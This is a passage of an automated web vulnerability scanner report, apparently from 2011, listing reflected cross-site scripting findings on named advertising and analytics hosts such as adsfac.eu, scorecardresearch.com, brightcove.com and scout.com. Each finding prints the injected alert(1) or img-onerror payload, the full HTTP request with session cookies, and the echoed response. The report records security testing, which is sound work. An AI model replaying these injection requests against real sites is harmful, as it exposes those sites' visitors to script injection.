/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "ad"; rm_url = "http://ad.technoratimedia.com/imp?72afb"-alert(1)-"c9cbad768b4=1&Z=728x90&atf=0&brw=cr3&efo=0&os=wn7&pfm=1&prm=0&rtg=ga&s=1782249&tent=ch&tnws=ch&uatRandNo=74877&_salt=2562200122";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!windo
...[SNIP]...

1.19. http://adsfac.eu/ag.asp [cc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adsfac.eu
Path:	/ag.asp

Issue detail

The value of the cc request parameter is copied into the HTML document as plain text between tags. The payload a7f40<script>alert(1)</script>432b200b5ff was submitted in the cc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ag.asp?cc=a7f40<script>alert(1)</script>432b200b5ff&source=js&ord=[timestamp] HTTP/1.1
Host: adsfac.eu
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.milkround.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UserID=610040839265718; FSCIT00728473=uid=104893036; FSCIT007=pctl=28473&pctm=1&fpt=0%2C28473%2C&pct%5Fdate=4294&FL28473=1&FM149947=1&pctc=149947&FQ=1

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Length: 293
Content-Type: text/html
Expires: Tue, 04 Oct 2011 20:09:27 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: FSa7f40%3Cscript%3Ealert%281%29%3C%2Fscript%3E432b200b5ff0=uid=107239383; expires=Wed, 05-Oct-2011 20:10:26 GMT; domain=.adsfac.eu; path=/
Set-Cookie: FSa7f40%3Cscript%3Ealert%281%29%3C%2Fscript%3E432b200b5ff=pctl=0&fpt=0%2C0%2C&pct%5Fdate=4294&pctm=1&FM1=1&pctc=1&FL0=1&FQ=1; expires=Fri, 04-Nov-2011 21:10:26 GMT; domain=.adsfac.eu; path=/
Set-Cookie: UserID=610040839265718aa8cb77f64554de065e9d97d; expires=Fri, 04-Nov-2011 21:10:26 GMT; domain=.adsfac.eu; path=/
P3P: CP="NOI DSP COR CUR PSA OUR BUS UNI NAV INT"
Date: Tue, 04 Oct 2011 20:10:27 GMT

if (typeof(fd_clk) == 'undefined') {var fd_clk = 'http://adsfac.eu/link.asp?cc=a7f40<script>alert(1)</script>432b200b5ff.0.0&CreativeID=1';}document.write('<a href="'+fd_clk+'&CreativeID=1" target="_blank">
...[SNIP]...

1.20. http://adsfac.net/ag.asp [cc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adsfac.net
Path:	/ag.asp

Issue detail

The value of the cc request parameter is copied into the HTML document as plain text between tags. The payload 1b425<script>alert(1)</script>926cd7da7c3 was submitted in the cc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ag.asp?cc=1b425<script>alert(1)</script>926cd7da7c3&source=js&ord=920717113 HTTP/1.1
Host: adsfac.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://view.atdmt.com/2D1/iview/289812590/direct;wi.300;hi.250/01/4264749?click=http://ad.au.doubleclick.net/6k%3Bh%3Dv8/3b96/3/0/%2a/l%3B246942787%3B0-0%3B0%3B30941364%3B4307-300/250%3B41115319/41133106/1%3B%3B%7Eokv%3D%3Bsec1%3Dhome%3Barea%3Dhome%3Btile%3D4%3Bpos%3D1%3Bsz%3D300x250%2C300x600%3Bkw%3Dfox+sports%2Cfox+sports+videos%2Cfox+sports+news%2Cfoxsports+au%2Cfox+news+sports%2Cfox+sports+online%2Cfox+sports+au%2Cwatch+fox+sports+online%2Cafl%2Cnrl%2Crugby+league%2Cstate+of+origin%2Crugby%2Crugby+union%2Cwallabies%2Cfootball%2Csoccer%2Ca-league%2Cepl%2Csocceroos%2Ccricket%2Cmotor+sport%2Ctennis%2Cgolf+%3B%7Esscs%3D%3f
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSHOM032=fpt=0%2C150687%2C&pct%5Fdate=4273&pctl=150687&FL150687=1&pctm=1&FM216892=1&pctc=216892&FQ=1; FSUBA007=fpt=0%2C69739%2C&gid=7660725445&STT=compare%2520savings%2520accounts%2520rates&pctm=1&pctcrt=1&pctl=69739&FL69739=1&xid=SnZCogZMH%5F7660725445&FM143325=1&pctc=143325&pdc=4290&FQ=1; FSDDA024=fpt=0%2C69739%2C&gid=8339786469&STT=bank%2520account%2520high%2520interest&pctm=1&pctcrt=1&FL69739=1&pctl=69739&FM153167=1&pctc=153167&pdc=4290&FQ=1; FSATR071=pctm=2&FL154149=2&pctc=221544&FQ=2&pctl=154149&FM221544=2&fpt=0%2C154149%2C&pct%5Fdate=4295; FSATR071154149=uid=7011717; FSGEP009145951=uid=7339671; FSGEP009=pctl=145951&fpt=0%2C145951%2C&pct%5Fdate=4295&pctm=1&FL145951=1&FM222647=1&pctc=222647&FQ=1; UserID=991308392614943

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 04 Oct 2011 20:31:06 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR CUR PSA OUR BUS UNI NAV INT"
Pragma: no-cache
Content-Length: 301
Content-Type: text/html
Expires: Tue, 04 Oct 2011 20:30:06 GMT
Set-Cookie: FS1b425%3Cscript%3Ealert%281%29%3C%2Fscript%3E926cd7da7c30=uid=9588089; expires=Wed, 05-Oct-2011 20:31:06 GMT; domain=.adsfac.net; path=/
Set-Cookie: FS1b425%3Cscript%3Ealert%281%29%3C%2Fscript%3E926cd7da7c3=pctl=0&fpt=0%2C0%2C&pct%5Fdate=4295&pctm=1&FM665=1&pctc=665&FL0=1&FQ=1; expires=Fri, 04-Nov-2011 20:31:06 GMT; domain=.adsfac.net; path=/
Set-Cookie: UserID=99130839261494330b3e791efde65d3500815c7; expires=Fri, 04-Nov-2011 20:31:06 GMT; domain=.adsfac.net; path=/
Cache-control: private

if (typeof(fd_clk) == 'undefined') {var fd_clk = 'http://adsfac.net/link.asp?cc=1b425<script>alert(1)</script>926cd7da7c3.0.0&CreativeID=665';}document.write('<a href="'+fd_clk+'&CreativeID=665" target="_blank">
...[SNIP]...

1.21. http://api.echoenabled.com/api/v1/search [q parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://api.echoenabled.com
Path:	/api/v1/search

Issue detail

The value of the q request parameter is copied into the HTML document as plain text between tags. The payload 8ed8c<a>f98f7f6b4df was submitted in the q parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /api/v1/search?q=childrenof%3Ahttp%3A%2F%2Fwww.thedailybeast.com%2Farticles%2F2011%2F10%2F04%2Fthe-simpsons-money-dispute-may-shut-down-fox-tv-s-long-running-hit.html+-source%3ATwitter+-state%3AModeratorDeleted%2CModeratorFlagged%2CSystemFlagged+-user.state%3AModeratorBanned+children%3A1+-source%3ATwitter+-state%3AModeratorDeleted%2CModeratorFlagged%2CSystemFlagged+-user.state%3AModeratorBanned+8ed8c<a>f98f7f6b4df&appkey=prod.newsweek.com&callback=jQuery16200750702265650034_1317758935251 HTTP/1.1
Host: api.echoenabled.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.thedailybeast.com/articles/2011/10/04/the-simpsons-money-dispute-may-shut-down-fox-tv-s-long-running-hit.html?cid=askmentrade
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Server: Yaws/1.85 Yet Another Web Server
Date: Tue, 04 Oct 2011 20:30:44 GMT
Content-Length: 161
Content-Type: application/x-javascript; charset="utf-8"

jQuery16200750702265650034_1317758935251({ "result": "error", "errorCode": "wrong_query", "errorMessage": "Parse error near: \"8ed8c<a>f98f7f6b4df\" at 361" });

1.22. http://api.echoenabled.com/v1/search [q parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://api.echoenabled.com
Path:	/v1/search

Issue detail

The value of the q request parameter is copied into the HTML document as plain text between tags. The payload 8c9fc<a>67f44da5a47 was submitted in the q parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /v1/search?callback=jQuery16200750702265650034_1317758935242&q=childrenof%3Ahttp%3A%2F%2Fwww.thedailybeast.com%2Farticles%2F2011%2F10%2F04%2Fthe-simpsons-money-dispute-may-shut-down-fox-tv-s-long-running-hit.html+-source%3ATwitter+-state%3AModeratorDeleted%2CModeratorFlagged%2CSystemFlagged+-user.state%3AModeratorBanned+children%3A1+-source%3ATwitter+-state%3AModeratorDeleted%2CModeratorFlagged%2CSystemFlagged+-user.state%3AModeratorBanned+8c9fc<a>67f44da5a47&appkey=prod.newsweek.com&_=1317758951074 HTTP/1.1
Host: api.echoenabled.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.thedailybeast.com/articles/2011/10/04/the-simpsons-money-dispute-may-shut-down-fox-tv-s-long-running-hit.html?cid=askmentrade
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Server: Yaws/1.85 Yet Another Web Server
Date: Tue, 04 Oct 2011 20:17:56 GMT
Content-Length: 161
Content-Type: application/x-javascript; charset="utf-8"

jQuery16200750702265650034_1317758935242({ "result": "error", "errorCode": "wrong_query", "errorMessage": "Parse error near: \"8c9fc<a>67f44da5a47\" at 361" });

1.23. http://b.scorecardresearch.com/beacon.js [c1 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload 49210<script>alert(1)</script>90075246625 was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=349210<script>alert(1)</script>90075246625&c2=7117341&c3=5797640&c4=44103179&c5=70503637&c6= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://m.adnxs.com/tt?member=280&inv_code=SPTSHP&cb=1629178796
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633; UIDR=1317740365

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Tue, 18 Oct 2011 20:15:23 GMT
Date: Tue, 04 Oct 2011 20:15:23 GMT
Content-Length: 1257
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
E.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();

COMSCORE.beacon({c1:"349210<script>alert(1)</script>90075246625", c2:"7117341", c3:"5797640", c4:"44103179", c5:"70503637", c6:"", c10:"", c15:"", c16:"", r:""});

1.24. http://b.scorecardresearch.com/beacon.js [c2 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload 5f83e<script>alert(1)</script>da15b6e6336 was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=71173415f83e<script>alert(1)</script>da15b6e6336&c3=5797640&c4=44103179&c5=70503637&c6= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://m.adnxs.com/tt?member=280&inv_code=SPTSHP&cb=1629178796
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633; UIDR=1317740365

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Tue, 18 Oct 2011 20:15:24 GMT
Date: Tue, 04 Oct 2011 20:15:24 GMT
Content-Length: 1257
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
on(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();

COMSCORE.beacon({c1:"3", c2:"71173415f83e<script>alert(1)</script>da15b6e6336", c3:"5797640", c4:"44103179", c5:"70503637", c6:"", c10:"", c15:"", c16:"", r:""});

1.25. http://b.scorecardresearch.com/beacon.js [c3 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload 468d6<script>alert(1)</script>893df73b0c6 was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=7117341&c3=5797640468d6<script>alert(1)</script>893df73b0c6&c4=44103179&c5=70503637&c6= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://m.adnxs.com/tt?member=280&inv_code=SPTSHP&cb=1629178796
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633; UIDR=1317740365

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Tue, 18 Oct 2011 20:15:24 GMT
Date: Tue, 04 Oct 2011 20:15:24 GMT
Content-Length: 1257
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();

COMSCORE.beacon({c1:"3", c2:"7117341", c3:"5797640468d6<script>alert(1)</script>893df73b0c6", c4:"44103179", c5:"70503637", c6:"", c10:"", c15:"", c16:"", r:""});

1.26. http://b.scorecardresearch.com/beacon.js [c4 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload 25e89<script>alert(1)</script>c6c67ced0d5 was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=7117341&c3=5797640&c4=4410317925e89<script>alert(1)</script>c6c67ced0d5&c5=70503637&c6= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://m.adnxs.com/tt?member=280&inv_code=SPTSHP&cb=1629178796
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633; UIDR=1317740365

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Tue, 18 Oct 2011 20:15:25 GMT
Date: Tue, 04 Oct 2011 20:15:25 GMT
Content-Length: 1257
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();

COMSCORE.beacon({c1:"3", c2:"7117341", c3:"5797640", c4:"4410317925e89<script>alert(1)</script>c6c67ced0d5", c5:"70503637", c6:"", c10:"", c15:"", c16:"", r:""});

1.27. http://b.scorecardresearch.com/beacon.js [c5 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload 59fe7<script>alert(1)</script>3259b533bda was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=7117341&c3=5797640&c4=44103179&c5=7050363759fe7<script>alert(1)</script>3259b533bda&c6= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://m.adnxs.com/tt?member=280&inv_code=SPTSHP&cb=1629178796
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633; UIDR=1317740365

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Tue, 18 Oct 2011 20:15:25 GMT
Date: Tue, 04 Oct 2011 20:15:25 GMT
Content-Length: 1257
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();

COMSCORE.beacon({c1:"3", c2:"7117341", c3:"5797640", c4:"44103179", c5:"7050363759fe7<script>alert(1)</script>3259b533bda", c6:"", c10:"", c15:"", c16:"", r:""});

1.28. http://b.scorecardresearch.com/beacon.js [c6 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload ee0c7<script>alert(1)</script>baa6f3b66f9 was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=7117341&c3=5797640&c4=44103179&c5=70503637&c6=ee0c7<script>alert(1)</script>baa6f3b66f9 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://m.adnxs.com/tt?member=280&inv_code=SPTSHP&cb=1629178796
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633; UIDR=1317740365

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Tue, 18 Oct 2011 20:15:26 GMT
Date: Tue, 04 Oct 2011 20:15:26 GMT
Content-Length: 1257
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
h-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();

COMSCORE.beacon({c1:"3", c2:"7117341", c3:"5797640", c4:"44103179", c5:"70503637", c6:"ee0c7<script>alert(1)</script>baa6f3b66f9", c10:"", c15:"", c16:"", r:""});

1.29. http://c.brightcove.com/services/messagebroker/amf [3rd AMF string parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://c.brightcove.com
Path:	/services/messagebroker/amf

Issue detail

The value of the 3rd AMF string parameter is copied into the HTML document as plain text between tags. The payload 4fba7<script>alert(1)</script>30751131f5a was submitted in the 3rd AMF string parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /services/messagebroker/amf?playerKey=AQ~~,AAAAAAEDRq0~,qRcfDOX2mNu3MBQVberx3rCXi0MGsF8M HTTP/1.1
Host: c.brightcove.com
Proxy-Connection: keep-alive
Content-Length: 554
Origin: http://c.brightcove.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
content-type: application/x-amf
Accept: */*
Referer: http://c.brightcove.com/services/viewer/federated_f9?&width=472&height=310&flashID=1159880448001&bgcolor=%23FFFFFF&playerID=889778564001&playerKey=AQ~~%2CAAAAAAEDRq0~%2CqRcfDOX2mNu3MBQVberx3rCXi0MGsF8M&isVid=true&isUI=true&dynamicStreaming=true&autoStart=false&mute=false&%40videoPlayer=1159880448001&wmode=opaque&debuggerID=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

.......Fcom.brightcove.experience.ExperienceRuntimeFacade.getDataForExperience../1..... ...Q8522cb0274262408ea8339a7e8ccbda9753644d9
cccom.brightcove.experience.ViewerExperienceRequest.experienceId.de
...[SNIP]...

Response

HTTP/1.1 200 OK
X-BC-Client-IP: 50.23.123.106
X-BC-Connecting-IP: 50.23.123.106
Content-Type: application/x-amf
Vary: Accept-Encoding
Date: Tue, 04 Oct 2011 22:20:02 GMT
Server:
Content-Length: 6440

......../1/onResult.......
.C[com.brightcove.templating.ViewerExperienceDTO#analyticsTrackers.publisherType.publisherId.playerKey.version#programmedContent!adTranslationSWF.id.hasProgramming+programmi
...[SNIP]...
p4j.....eAQ~~,AAAAAAEDRq0~,qRcfDOX2mNu3MBQVberx3rCXi0MGsF8M. ..videoPlayer
sicom.brightcove.player.programming.ProgrammedMediaDTO.mediaId..playerId.componentRefId type.mediaDTO
.Bp..1......ivideoPlayer4fba7<script>alert(1)</script>30751131f5a.........
.cOcom.brightcove.catalog.trimmed.VideoDTO.dateFiltered+FLVFullLengthStreamed/SWFVerificationRequired.endDate.FLVFullCodec.linkText.geoRestricted.previewLength.FLVPreviewSize.longDescription.
...[SNIP]...

1.30. http://cdn-cms.scout.com/feeds/analyticsfeed.ashx [callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://cdn-cms.scout.com
Path:	/feeds/analyticsfeed.ashx

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload c5b5e<script>alert(1)</script>efaaefa4819 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feeds/analyticsfeed.ashx?page=http%3A//www.scout.com/&format=json&callback=$.analytics.reportc5b5e<script>alert(1)</script>efaaefa4819 HTTP/1.1
Host: cdn-cms.scout.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.scout.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaNIODID=T8kdbWQMqa2-XMYANwA; sample=38; __utma=202704078.1428052287.1317753697.1317753697.1317756177.2; __utmz=202704078.1317756177.2.2.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; RefId=0; BrandId=0; SessionBrandId=0

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Server: Scoutweb11
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.0.0.0.30012
Cache-Control: private
Content-Type: application/x-javascript; charset=utf-8
Vary: Accept-Encoding
Content-Length: 340
Date: Tue, 04 Oct 2011 20:14:24 GMT
Connection: close
Akamai: True

$.analytics.reportc5b5e<script>alert(1)</script>efaaefa4819({"network":"Scout","site":"www","sports":[],"categories":[],"pagetype":"FrontPage","pagesubtype":"","author":"","dateoverride":{"rfc822":"","year":"","month":"","day":"","hour":"","minute":"","second"
...[SNIP]...

1.31. http://cdn-forums.scout.com/adfeed.ashx [callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://cdn-forums.scout.com
Path:	/adfeed.ashx

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload f7c4b<img%20src%3da%20onerror%3dalert(1)>48071189668 was submitted in the callback parameter. This input was echoed as f7c4b<img src=a onerror=alert(1)>48071189668 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /adfeed.ashx?s=143&p=1&c=1&format=json&callback=$.showAd.cacheAdCodesf7c4b<img%20src%3da%20onerror%3dalert(1)>48071189668 HTTP/1.1
Host: cdn-forums.scout.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.scout.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaNIODID=T8kdbWQMqa2-XMYANwA; sample=38; __utma=202704078.1428052287.1317753697.1317753697.1317756177.2; __utmz=202704078.1317756177.2.2.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; RefId=0; BrandId=0; SessionBrandId=0

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Server: MBRD25
X-AspNet-Version: 2.0.50727
X-Website-Assembly-Version: 2.21.0.0
Cache-Control: private
Content-Type: application/x-javascript; charset=utf-8
Vary: Accept-Encoding
Content-Length: 367
Date: Tue, 04 Oct 2011 20:14:28 GMT
Connection: close
Akamai: True

$.showAd.cacheAdCodesf7c4b<img src=a onerror=alert(1)>48071189668({"ads":[{"code":"SPTSN1","height":90,"type":"DISPLAY","width":728},{"code":"SPTSN3","height":600,"type":"DISPLAY","width":160},{"code":"SPTSHP","height":250,"type":"DISPLAY","width":300},{"code":"SPTS
...[SNIP]...

